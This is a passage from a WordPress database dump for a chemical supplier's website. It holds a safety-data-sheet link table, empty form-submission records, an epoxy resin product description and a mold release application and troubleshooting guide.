2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110X.pdf">MS-110X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-10-20 14:35:11', '2016-10-20 14:35:11', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2679, 91, '2016-10-20 16:22:56', '2016-10-20 16:22:56', '', '', '', 'publish', 'closed', 'closed', '', '2679', '', '', '2016-10-20 16:22:56', '2016-10-20 16:22:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/2679/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2680, 0, '2016-10-20 17:28:18', '2016-10-20 17:28:18', '', '', '', 'publish', 'closed', 'closed', '', '2680', '', '', '2016-10-20 17:28:18', '2016-10-20 17:28:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/2680/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2681, 0, '2016-10-20 19:19:16', '2016-10-20 19:19:16', '', '', '', 'publish', 'closed', 'closed', '', '2681', '', '', '2016-10-20 19:19:16', '2016-10-20 19:19:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/2681/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2682, 0, '2016-10-20 20:08:09', '2016-10-20 20:08:09', '', '', '', 'publish', 'closed', 'closed', '', '2682', '', '', '2016-10-20 20:08:09', '2016-10-20 20:08:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2682/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2683, 97, '2016-10-21 10:44:05', '2016-10-21 10:44:05', '', '', '', 'publish', 'closed', 'closed', '', '2683', '', '', '2016-10-21 10:44:05', '2016-10-21 10:44:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/2683/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2684, 98, '2016-10-21 11:51:02', '2016-10-21 11:51:02', '', '', '', 'publish', 'closed', 'closed', '', '2684', '', '', '2016-10-21 11:51:02', '2016-10-21 11:51:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/2684/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2685, 100, '2016-10-21 13:16:19', '2016-10-21 13:16:19', '', '', '', 'publish', 'closed', 'closed', '', '2685', '', '', '2016-10-21 13:16:19', '2016-10-21 13:16:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/2685/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2686, 102, '2016-10-21 13:45:36', '2016-10-21 13:45:36', '', '', '', 'publish', 'closed', 'closed', '', '2686', '', '', '2016-10-21 13:45:36', '2016-10-21 13:45:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/2686/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2687, 0, '2016-10-21 17:20:03', '2016-10-21 17:20:03', '', '', '', 'publish', 'closed', 'closed', '', '2687', '', '', '2016-10-21 17:20:03', '2016-10-21 17:20:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2687/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2688, 3, '2016-10-21 18:45:25', '2016-10-21 18:45:25', 'EPON 826 is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites) when crosslinked or hardened with appropriate curing agents. Miller-Stephenson is a certified EP Benefits include:\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Low ionic contamination</li>\n 	<li>Reacts with a full range of curing agents</li>\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\n</ul>\nEPON 826 is commonly used to fabricate high strength fiber reinforced pipes and composites. The low viscosity of the resin provides rapid wetout of a wide range of reinforcing fibers including glass, graphite, aramid and boron. High fiber content with low void content can be achieved with this resin. Structural composites such as this have a high ratio of strength to weight. This makes them suitable for applications ranging from sporting goods equipment to aerospace structural members.\n\nEPON Resin 826 systems are also excellent electrical insulators. Such systems are used frequently in electrical encapsulations, laminates and molding compounds.Structures, linings and coatings made with EPON Resin 826 protect metal surfaces and resist attack from acids, bases, solvents and fuel. They find use in the oil, gas, mining and chemical industries.The higher shear strength obtained with EPON Resin 826 adhesives is due in part to the low internal stresses inherent in cured epoxy resins. Such adhesives are used to bond a broad range of substrates<span class="GramE">..</span>\n\n<strong>Application</strong>\n\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi\n\nMiller-Stephenson is an Epon 826 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications.', 'EPON™ 826', 'EPON™ Resin 826 is a low viscosity, light colored liquid bisphenol A based epoxy resin. It finds use in a variety of applications (coatings and composites) when crosslinked or hardened with appropriate curing agents. Benefits include:\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Low ionic contamination</li>\n 	<li>Reacts with a full range of curing agents</li>\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\n</ul>', 'inherit', 'closed', 'closed', '', '861-autosave-v1', '', '', '2016-10-21 18:45:25', '2016-10-21 18:45:25', '', 861, 'https://www.miller-stephenson.com/861-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2689, 103, '2016-10-21 18:44:23', '2016-10-21 18:44:23', '', '', '', 'publish', 'closed', 'closed', '', '2689', '', '', '2016-10-21 18:44:23', '2016-10-21 18:44:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/2689/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2690, 0, '2016-10-21 19:35:07', '2016-10-21 19:35:07', '', '', '', 'publish', 'closed', 'closed', '', '2690', '', '', '2016-10-21 19:35:07', '2016-10-21 19:35:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/2690/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2692, 0, '2016-10-22 21:10:40', '2016-10-22 21:10:40', '', '', '', 'publish', 'closed', 'closed', '', '2692', '', '', '2016-10-22 21:10:40', '2016-10-22 21:10:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/2692/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2693, 106, '2016-10-23 08:29:45', '2016-10-23 08:29:45', '', '', '', 'publish', 'closed', 'closed', '', '2693', '', '', '2016-10-23 08:29:45', '2016-10-23 08:29:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/2693/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2694, 3, '2016-10-24 13:58:17', '2016-10-24 13:58:17', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set the HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 0.6 mm to 1.0 mm.  Spray 8-12 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\r\n 	<li><strong>Mold Release Application Guide</strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'publish', 'closed', 'closed', '', 'mold-release-application-guide', '', '', '2017-05-30 12:52:24', '2017-05-30 12:52:24', '', 0, 'https://www.miller-stephenson.com/?p=2694', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2695, 3, '2016-10-23 14:22:45', '2016-10-23 14:22:45', '', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 14:22:45', '2016-10-23 14:22:45', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2696, 3, '2016-10-23 18:43:05', '2016-10-23 18:43:05', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="text-decoration: 